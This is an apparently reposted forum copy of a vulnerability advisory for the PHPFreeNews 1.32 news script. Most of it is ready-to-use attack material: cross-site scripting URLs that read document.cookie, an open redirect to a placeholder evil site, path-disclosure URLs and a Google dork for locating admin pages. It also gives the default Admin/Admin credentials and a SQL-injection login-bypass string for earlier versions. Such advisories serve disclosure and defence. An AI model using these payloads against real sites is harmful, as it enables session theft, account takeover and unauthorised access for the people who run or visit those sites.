[转载]PHPFreeNews输入确认跨站脚本及SQL漏洞
文章作者:retrogod at aliceposta.itPHPFreeNews Version 1.32 news cross site scripting, path disclosure, information disclosure
PHPFreenews previous versions MySQL injection / Login bypass
author site: [url]http://www.phpfreenews.co.uk/Main_Intro.php[/url]
xss poc:
http://[target]/[path]/inc/Footer.php?ScriptVersion=<script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=")}//--><
/script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=")}//--></scrip
t><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=")}//--></scri
pt><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=")}//--><
/script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=")}//--><
/script><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=")}//--></s
cript><script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupHeight=")}//--></
script><script>alert(document.cookie)</script>
also a user can craft a url to redirect a victim to an evil site:
http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]
path disclosure:
http://[target]/[path]/inc/ArchiveOldNews.php
http://[target]/[path]/inc/Categories.php
http://[target]/[path]/inc/CheckLogout.php
http://[target]/[path]/inc/CommentsApproval.php
http://[target]/[path]/inc/Images.php
http://[target]/[path]/inc/NewsList.php
http://[target]/[path]/inc/Password.php
http://[target]/[path]/inc/Post.php
http://[target]/[path]/inc/PostsApproval.php
http://[target]/[path]/inc/PurgeOldNews.php
http://[target]/[path]/inc/SetSticky.php
http://[target]/[path]/inc/SetVisible.php
http://[target]/[path]/inc/Statistics.php
http://[target]/[path]/inc/Template.php
http://[target]/[path]/inc/UserDefinedCodes.php
http://[target]/[path]/inc/Users.php
information disclosure:
googledork:
PHPFreeNews inurl:Admin.php
(with this, you can passively fingerprint the server, PHP & MySQL version are in Google descripti
on...
because this info are shownwed with non-chalance in admin.php page ;) )
default password:
login: Admin
pass: Admin
MySQL Injection / Login Bypass in previous versions:
login: Admin
password: ') or isnull(1/0) or ('a'='a
note: all string, not consider 'or'
in 1.32 version LoginUsername and LoginPassword vars are addslashed... but
I think an injection is not impossible:
/') or isnull(1/0) or ([some trick]
^ ^
| |_____________always true statement-------------
| |
in query we have -------- valid statement-------- |
| |
SELECT * FROM news_users WHERE Password = MD5('\\\') or isnull(1/0) or ([some trick]') AND Username =
'Admin'
rgod
email: retrogod at aliceposta.it
site: [url]http://rgod.altervista.org[/url]
original advisory: [url]http://rgod.altervista.org/phpfreenews.html[/url]
页:
[1]